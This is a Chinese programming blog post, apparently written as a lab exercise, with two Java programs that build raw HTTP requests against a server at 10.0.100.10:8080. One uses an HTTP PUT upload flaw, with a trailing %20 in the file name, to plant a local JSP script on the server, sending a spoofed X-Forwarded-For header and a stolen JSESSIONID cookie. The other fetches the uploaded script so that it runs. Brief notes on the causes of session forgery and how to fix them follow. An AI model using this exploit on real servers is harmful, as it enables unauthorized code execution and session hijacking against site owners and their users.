Java -- 访问控制,伪造请求,拿cookie

最新推荐文章于 2022-07-25 14:35:00 发布
最新推荐文章于 2022-07-25 14:35:00 发布
阅读量675 收藏
点赞数
分类专栏: Java 文章标签: session cookie java servlet csrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tryheart/article/details/108416927
版权

绕过服务器限制

通过自己构造请求头的形式,绕过服务器的限制,伪造一个请求头进行身份伪造。

package com.mtlk.test;

import java.io.*;
import java.net.Socket;
import java.util.Scanner;

public class Put {
    public static void main(String[] args) throws IOException {
        StringBuffer body = new StringBuffer("");

//        InputStream ii = new FileInputStream("E:/123.jsp");
        //获取本地文件脚本
        InputStream ii = new FileInputStream("E:/qxx.jsp");
        Scanner ss = new Scanner(ii);
        while(ss.hasNextLine()){
            body.append(ss.nextLine());
        }
//        StringBuilder request = new StringBuilder("PUT /exam/qxx555.jsp%20 HTTP/1.1\r\n");
        //设置请求体
        StringBuilder request = new StringBuilder("PUT /exam/qxx789.jsp%20 HTTP/1.1\r\n");
        request.append("HOST:10.0.100.10\r\n");
        request.append("X-Forwarded-For:192.168.18.51\r\n");
        request.append("User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 FireFox/78.0\r\n");
        request.append("Cookie:JSESSIONID=02C9D0FBFB03537475774E3C1A935A9C\r\n");
//        request.append("Content-Type:text/html\r\n");
//        request.append("Content-Length:"+body.toString().length()+"\r\n\r\n");
        request.append(body.toString());
        System.out.println(request.toString());

        Socket s = new Socket("10.0.100.10",8080);

        PrintWriter pw = new PrintWriter(s.getOutputStream(),true);
        pw.println(request.toString());
        pw.flush();

        InputStream is = s.getInputStream();
        Scanner sc = new Scanner(is);
        System.out.println("-------------------------------");
        while (sc.hasNextLine()){
            System.out.println(sc.nextLine());
        }

    }
}

设置请求体将允许的IP地址,和浏览器信息,甚至cookie信息填入请求体里面。

利用put漏洞上传文件,执行文件脚本内容
再利用get获取文件

package com.mtlk.test;

import java.io.IOException;
import java.io.InputStream;
import java.io.PrintWriter;
import java.net.Socket;
import java.util.Scanner;

public class Get {


    public static void main(String[] args) throws IOException {

        Socket s = new Socket("10.0.100.10",8080);

//            StringBuilder sb = new StringBuilder("GET /exam/qxx555.jsp HTTP/1.1\r\n");
            //获取服务器文件
            StringBuilder sb = new StringBuilder("GET /exam/qxx789.jsp HTTP/1.1\r\n");
            //设置对应请求体
            sb.append("HOST:10.0.100.10:8080\r\n");
            sb.append("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 FireFox/78.0\r\n");
            sb.append("Cookie:02C9D0FBFB03537475774E3C1A935A9C\r\n");
            sb.append("X-Forwarded-For:192.168.18.51\r\n");

            PrintWriter pw = new PrintWriter(s.getOutputStream());
            pw.println(sb.toString());
            pw.flush();
            
            System.out.println(sb.toString());
            System.out.println("---------------------------------------------");


        InputStream is = s.getInputStream();
        Scanner ss = new Scanner(is);
        while (ss.hasNextLine()){
            System.out.println(ss.nextLine());
        }
    }
}

成因及解决方法

身份伪造

原因

基于session:拿到别人的cookie,然后填充到自己的请求头里面

基于cookie: 把身份信息记录于cookie

解决办法

检查session的过期,不能将用户关键信息存放于cookie

把前一个账户踢下线,检查常用IP地址归属地

身份认证失败

原因

没有对Session进行验证,登录后没有填充Session

解决办法

检查登陆后session是否被填充,session是否有验证

在没有登录的情况下访问功能页面并提交请求

星辰流炎
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java伪造cookie登录_Cookie伪造防修改
weixin_30423065的博客
02-25 744
主要防止非法用户修改cookie信息,以及cookie的超时时间传统cookie存储,Cookie(name, value),value很容易就被篡改。防修改cookie存储,Cookie(name, value+“&&”+ signToken+“&&”+saveTime+“&&”+maxTime)signToken :签名密钥 由md5(value...
java模拟cookie_Java模拟HTTP请求,带cookie
weixin_39576751的博客
02-20 673
不多说,直接上代码import java.io.BufferedReader;import java.io.DataOutputStream;import java.io.IOException;import java.io.InputStreamReader;import java.net.HttpURLConnection;import java.net.MalformedURLExcepti...
java模拟HttpRequest
アイモ
07-15 674
前一段时间,遇到一个需求,需要用java代码了模拟一个http·请求,要可以传递post参数和上传文件。做了些google后,整理如下: [code="java"] import java.io.BufferedInputStream; import java.io.ByteArrayOutputStream; import java.io.DataOutputStream; imp...
java模拟发送request
懒人部落
09-09 1118
 可以模拟发送数据,我首先想到的是 外挂 作弊 呵呵import java.io.BufferedOutputStream;import java.io.File;import java.io.FileNotFoundException;import java.io.FileOutputStream;import java.io.IOException;im
java http 伪造请求头
weixin_30933531的博客
06-06 347
import java.io.BufferedReader; import java.io.InputStream; import java.io.InputStreamReader; import java.net.HttpURLConnection; import java.net.URL; /** * Created by Administrator on 2017/6...
JAVA-BBS-WEB.rar_java-bbs
09-20
数据库操作可能通过JDBC(Java Database Connectivity)进行,也可能使用ORM框架如Hibernate或MyBatis来简化数据访问层的编写。 4. **前端技术**:尽管描述中没有明确指出,但Web应用通常会使用HTML、CSS和...
java操作cookie-实现两周内自动登录.doc
最新发布
10-25
当用户再次访问网站时,浏览器会自动将这个Cookie随同请求一起发送给服务器。 3. 服务器接收到请求后,从Cookie中读取用户名。为了防止恶意用户伪造Cookie,服务器还需要验证其他信息。这里通常采用Session ID,这是...
Java 模拟cookie登陆简单操作示例
08-24
当用户访问某个网站时,该网站可能会将 Cookie 信息写入到用户的浏览器中,以便下次用户访问该网站时能够快速识别用户的身份。 为什么需要模拟 Cookie 登陆? 在实际开发中,我们可能需要模拟用户的登陆行为,以便...
基于JAVA-JSP电子书下载系统源码.zip
10-04
这可能涉及到session管理和cookie的使用,以及基于角色的访问控制(RBAC)。 **6. 文件上传与下载** 电子书的上传和下载是系统的核心功能。Java提供了File和InputStream/OutputStream类来处理文件操作,而HTTP协议...
记一次COOKIE伪造登录
蚁景网安学院
03-08 3093
通过信息收集—发现它的密码规则如下(因重点是COOKIE伪造登录,故密码规则就不放图了,你懂的)
j2ee cookie 实现自动登录
人活着为了什么
03-27 517
   一、什么是用户自动登录?    对于我们的网站向已注册用户提供某些专门的服务,比如网上购物、在线下载、收费浏览等等,就会要求用户在使用这些服务之前进入登录页面,输入用户名和密码,并进行验证。     如果用户经常访问我们的网站,假如每天都访问一次,或者好几次,那么用户每次都重复这些登录操作就会感到相当厌烦。通过一些简单的技术手段,我们可以让网站“记住”那些在曾经登录过的用户。...
java中的Cookie的一些使用陷阱,切记!
孙益瑞的博客
04-10 1518
全文总结: 在读取Cookie,然后操作时,除了getName(),getValue()外,不要妄图得到其他信息,如下方法不会得到值的:cookie.getMaxAge();cookie.getDomain();。。。因为,客户端传来的时候,就只剩下key和value了。  Java中的Cookie操作: 在Java中利用Serlvet或者JSP scriptlet可以向浏览器端写入Cookie。...
Cookie伪造防修改
源码有毒的专栏
10-09 1万+
主要防止非法用户修改cookie信息,以及cookie的超时时间 传统cookie存储,Cookie(name, value),value很容易就被篡改。 防修改cookie存储,Cookie(name, value+“&&”+ signToken+“&&”+saveTime+“&&”+maxTime) signToken :签名密钥 由md5(value+saveTime+maxTime+”
使用java方式处理跨站请求伪造(CSRF)
weixin_43977799的博客
09-17 6238
什么是CSRF 跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。 跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任...
Java中的跨站请求伪造
allway2的博客
07-25 590
Java不提供针对CSRF攻击的内置保护;开发人员必须通过手动强制执行反CSRF令牌或使用许多经过良好测试的可用库之一来实现它。当使用标准的ServletAPI时,双重提交cookie技术可以如下实现。要生成用作标记的随机字符串,可以使用。...
跨站请求伪造CSRF
FEWY的博客
11-26 857
CSRF 介绍 CSRF,是跨站请求伪造(Cross Site Request Forgery)的缩写,是一种劫持受信任用户向服务器发送非预期请求的攻击方式。 通常情况下,CSRF 攻击是攻击者借助受害者的 Cookie 骗取服务器的信任,在受害者毫不知情的情况下以受害者名义伪造请求发送给受攻击服务器,从而在并未授权的情况下执行在权限保护之下的操作。 CSRF 攻击示例 这里有一个网站,用户可以看...
通过判断请求Header中的Referer来防止伪造请求
天使的心跳
10-28 5875
其实不会根本性的解决这个问题。 解决方法: 在web.xml中增加: refererFilter ltd.miku.web.securityenhance.xss.RefererFilter refererFilter /* REQUEST 然后RefererFilter
java 跨站请求伪造_Web安全之防范CSRF跨站请求伪造
weixin_35112750的博客
02-19 420
跨站请求伪造(Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。与XSS攻击相比,CSRF...
CTF web入门——HTTP头相关的----修改请求头伪造Cookie类题目——Bugku Web题目详细题解
热门推荐
日熙的博客
07-25 6万+
题目一:Bugku 程序员本地网站 1.打开题目显示如下: 题目二:Bugku 管理员系统 题目三:XCTF xff_referer
java如何解决跨站点请求伪造_跨站点请求伪造CSRF
06-09
Java中可以通过以下方式来解决跨站点请求伪造CSRF): 1. 使用CSRF token:在表单中嵌入一个随机生成的token,每次提交表单时都要在后台验证该token,以确保提交的请求来自合法的源。 2. 检查Referrer:在服务器端检查HTTP请求头中的Referrer字段,以确保请求来自合法的源。 3. 使用同源策略:在服务器端配置同源策略,限制浏览器只能向同源的服务器发送请求,从而防止跨站点请求。 4. 使用验证码:在表单中添加验证码,防止机器人提交表单。 5. 使用HTTP-only cookie:将cookie标记为HTTP-only,防止客户端脚本访问cookie,从而避免cookie被盗用。 这些方法都可以在Java实现,开发者可以根据具体情况选择适合自己的解决方案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值